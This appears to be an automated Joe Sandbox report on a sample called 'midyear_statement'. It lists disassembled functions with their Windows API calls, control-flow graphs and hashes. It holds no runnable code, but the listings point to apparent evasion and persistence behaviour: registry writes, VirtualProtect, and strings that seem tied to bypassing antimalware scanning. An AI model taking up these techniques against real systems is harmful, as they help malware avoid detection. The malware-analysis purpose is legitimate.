                                                                                                                                                                                          • API String ID: 2099061454-2063912171
                                                                                                                                                                                          • Opcode ID: 5e7b4f2ef62cfa77bdf50750ebc65fec9db39a6c78f13224a972fab3e11c8963
                                                                                                                                                                                          • Instruction ID: 8ea331762878d459a7f0e098457de4fb35dbbb8757ff4ec5df9e54a24dd93768
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7b4f2ef62cfa77bdf50750ebc65fec9db39a6c78f13224a972fab3e11c8963
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF017174200248AFE701EFE4DC41FDAB7ACEB88718F504460F544F7640C671FE508A68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 12683 40a1a8c-40a1a9b 12684 40a1b6c-40a1b6f 12683->12684 12685 40a1aa1-40a1aa5 12683->12685 12686 40a1c5c-40a1c60 12684->12686 12687 40a1b75-40a1b7f 12684->12687 12688 40a1b08-40a1b11 12685->12688 12689 40a1aa7-40a1aae 12685->12689 12694 40a16e8-40a170b call 40a1644 VirtualFree 12686->12694 12695 40a1c66-40a1c6b 12686->12695 12690 40a1b3c-40a1b49 12687->12690 12691 40a1b81-40a1b8d 12687->12691 12688->12689 12696 40a1b13-40a1b27 Sleep 12688->12696 12692 40a1adc-40a1ade 12689->12692 12693 40a1ab0-40a1abb 12689->12693 12690->12691 12705 40a1b4b-40a1b5f Sleep 12690->12705 12698 40a1b8f-40a1b92 12691->12698 12699 40a1bc4-40a1bd2 12691->12699 12702 40a1af3 12692->12702 12703 40a1ae0-40a1af1 12692->12703 12700 40a1abd-40a1ac2 12693->12700 12701 40a1ac4-40a1ad9 12693->12701 12711 40a170d-40a1714 12694->12711 12712 40a1716 12694->12712 12696->12689 12704 40a1b2d-40a1b38 Sleep 12696->12704 12707 40a1b96-40a1b9a 12698->12707 12699->12707 12709 40a1bd4-40a1bd9 call 40a14c0 12699->12709 12708 40a1af6-40a1b03 12702->12708 12703->12702 12703->12708 12704->12688 12705->12691 12710 40a1b61-40a1b68 Sleep 12705->12710 12713 40a1bdc-40a1be9 12707->12713 12714 40a1b9c-40a1ba2 12707->12714 12708->12687 12709->12707 12710->12690 12716 40a1719-40a1723 12711->12716 12712->12716 12713->12714 12720 40a1beb-40a1bf2 call 40a14c0 12713->12720 12717 40a1bf4-40a1bfe 12714->12717 12718 40a1ba4-40a1bc2 call 40a1500 12714->12718 12721 40a1c2c-40a1c59 call 40a1560 12717->12721 12722 40a1c00-40a1c28 VirtualFree 12717->12722 12720->12714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,00000000,040A1FE4), ref: 040A1B17
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,040A1FE4), ref: 040A1B31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                          • Opcode ID: ae7c2b19068e25a8dddae24a740692f358ca877e0eff5f7d33bd9f2eeb1a6620
                                                                                                                                                                                          • Instruction ID: c2e8cbaaca422acf88d075a9bafb78c07c60e3394d943088f1b7b42e469383c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae7c2b19068e25a8dddae24a740692f358ca877e0eff5f7d33bd9f2eeb1a6620
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA51C1716113408FE715CFA8D984B5ABBD0EF45318F1882BED445EF282E778E869C791
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BD1CE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 040BD30E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                          • Opcode ID: 295d627bc7b0683ce93cf15e2436bb0fbcfa4020f902a70c9c17c37c75d6654e
                                                                                                                                                                                          • Instruction ID: c00c8a5fcf09a4791153f6c132c67c025ef487ec8175c4e6161450f0fe462c1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 295d627bc7b0683ce93cf15e2436bb0fbcfa4020f902a70c9c17c37c75d6654e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D410C39B50209AFEB00EBE4D841EDEB3B9EF5960CF254531E040B7641DBB5BD218B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B5B70 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,040B5CB8,?,?,040B3844,00000001), ref: 040B5BCC
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,040B5CB8,?,?,040B3844,00000001), ref: 040B5BFA
                                                                                                                                                                                            • Part of subcall function 040A7CD4: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,040B3844,040B5C3A,00000000,040B5CB8,?,?,040B3844), ref: 040A7D22
                                                                                                                                                                                            • Part of subcall function 040A7EDC: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,040B3844,040B5C55,00000000,040B5CB8,?,?,040B3844,00000001), ref: 040A7EFB
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,040B5CB8,?,?,040B3844,00000001), ref: 040B5C5F
                                                                                                                                                                                            • Part of subcall function 040AA6BC: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,040AC31D,00000000,040AC377), ref: 040AA6DB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                                          • Opcode ID: 5ac64c2e1248eff4e081b531386e6801e5fd2f4e5d7d1189c79a4ab7702f009e
                                                                                                                                                                                          • Instruction ID: d4ea2fff9c80e88e3093998946ae6b3afd8570ba8afda8d18dd62477930075d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac64c2e1248eff4e081b531386e6801e5fd2f4e5d7d1189c79a4ab7702f009e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1317E70A006089FEB01EFE8CC81BDEB7F5AB4870CF548165D944B7380D779AE158BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BD596 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,041F48C8), ref: 040BD5DC
                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD614
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD61F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                          • Opcode ID: 11eb1e625078cb91fdce5f6950e59b7a61aedf5335027e79d41f728c7ba2bbc9
                                                                                                                                                                                          • Instruction ID: d658e6746ea5991900c715c74e47314201393c1f672f057bbd78432c921337f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11eb1e625078cb91fdce5f6950e59b7a61aedf5335027e79d41f728c7ba2bbc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23114C75640608AFEB00EFF9EC81ADEBBE8EB48608F804561F544E7250DB75FE618B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040BD598 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,041F48C8), ref: 040BD5DC
                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD614
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD61F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                          • Opcode ID: aa80ba9d7608a97f3c07c91d5be0fca413942939871db3a6bcedb32edff8ebaa
                                                                                                                                                                                          • Instruction ID: 495364a6b07f21845f1546992461085dd66a3303431d44cc04d5aef0e4c0002f
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa80ba9d7608a97f3c07c91d5be0fca413942939871db3a6bcedb32edff8ebaa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C114C75640608AFEB00EFF9EC81ADEBBE8EB48608F804561F544E7250DB75FE618B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B7B88 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                            • Part of subcall function 040B7AC0: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B01
                                                                                                                                                                                            • Part of subcall function 040B7AC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 040B7B07
                                                                                                                                                                                            • Part of subcall function 040B7AC0: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B21
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2543409266-0
                                                                                                                                                                                          • Opcode ID: d0248a79b8189b5bc25fe6d570cff0bb3fa706c2e40069801b6a99d6fa9700d8
                                                                                                                                                                                          • Instruction ID: db86ef1b1392de1ff60ea32531ce0e26f6f76d64c4be1de46c84ce93da953336
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0248a79b8189b5bc25fe6d570cff0bb3fa706c2e40069801b6a99d6fa9700d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4001C874600204AFF745EBF4EA41B9E7BA8DB8830CF148464A245BB690DB7ABD108B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AE2A8 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                                          • Opcode ID: aad5d7e2dbc8a5d7d7e6a823b1a559edd35215eebda437dbf07fc5f79c2292d6
                                                                                                                                                                                          • Instruction ID: 479fb0efb9746c4d7856411cc83cb13d9bd4caffd6425c4040e5e50b2a22dc3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: aad5d7e2dbc8a5d7d7e6a823b1a559edd35215eebda437dbf07fc5f79c2292d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8F0AF7178811086AB207BF8D8889EE3A999F4421C7104669E14ABB111DB24BC36A3E2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A4CC0 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 040A4CCB
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 040A4CDD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                                          • Opcode ID: 5bd30a3f01854c66fdfb21c9481b34454127c867239492e85848eeb07452f874
                                                                                                                                                                                          • Instruction ID: 2d52cf6a8566d29bd8716e76fb4476510ec54af51e8cd881988e3047cb9ad9f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bd30a3f01854c66fdfb21c9481b34454127c867239492e85848eeb07452f874
                                                                                                                                                                                          • Instruction Fuzzy Hash: BAE0ECBC2152015EFA542FA09C50BBA3269AFC1758F6444A9A410EE150D778F470A628
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B7020 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 040B731E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                                                                          • Opcode ID: 6b5bdba04471348a7cceef3e888a8fb6dddcefff7c3bd31128ce9544eb6ac80f
                                                                                                                                                                                          • Instruction ID: aa974be4a4f55ca8817fe10729acf791b682a39e53ea11a4d0065abaf7737cc3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b5bdba04471348a7cceef3e888a8fb6dddcefff7c3bd31128ce9544eb6ac80f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40B1CE74A01608AFDB54CF98E880ADDBBF2FF89314F248569E845BB360D735A845CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AE6A4 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 040AE6C5
                                                                                                                                                                                            • Part of subcall function 040AE2A8: VariantClear.OLEAUT32(?), ref: 040AE2B7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                                          • Opcode ID: 94b20921437c57bf2c9b247c651fc0c6f4f376f7c22d3569e2a31f5c6eea4469
                                                                                                                                                                                          • Instruction ID: 25f470ca1ec3113afe277e2264c7e3b98d626c71b9b5d900fc850d24486d112f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94b20921437c57bf2c9b247c651fc0c6f4f376f7c22d3569e2a31f5c6eea4469
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED11C66034021087E720AFB5C8C4DAF3BDA9F952587084865E44ABF295EA30FC61D3D2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AE340 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                                          • Opcode ID: 69320b788e330c48ef4b2934b6f83dc08a56234b5f8f748247242f1833b0a2af
                                                                                                                                                                                          • Instruction ID: 084799056ac30d9afe1481338406d664d1d7e4fb99a430d3ced5061a0a666ef1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69320b788e330c48ef4b2934b6f83dc08a56234b5f8f748247242f1833b0a2af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09312E72644109EBDB50DEE8C888AEE77ECEB09204F544561E909E7250D634F964CBE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B6CB0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,040B6CFD,?,?,?,00000000), ref: 040B6CDD
                                                                                                                                                                                            • Part of subcall function 040A4BD0: SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                                                                          • Opcode ID: 9f90fee341b2f2bbc0227a4ba2ac20c0d78572435885758c6e76f0f60b5b269c
                                                                                                                                                                                          • Instruction ID: 6ed7af38e948ac06289a1dcd64153692e246bebf31411ca6912957b5ddc81e9b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f90fee341b2f2bbc0227a4ba2ac20c0d78572435885758c6e76f0f60b5b269c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE0E535614208BBF702EBA0DC11EDA77ACDB8960CB520871E400F2210DA717D1484A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A57D8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040A57F6
                                                                                                                                                                                            • Part of subcall function 040A5A3C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,040A0000,040CC790), ref: 040A5A58
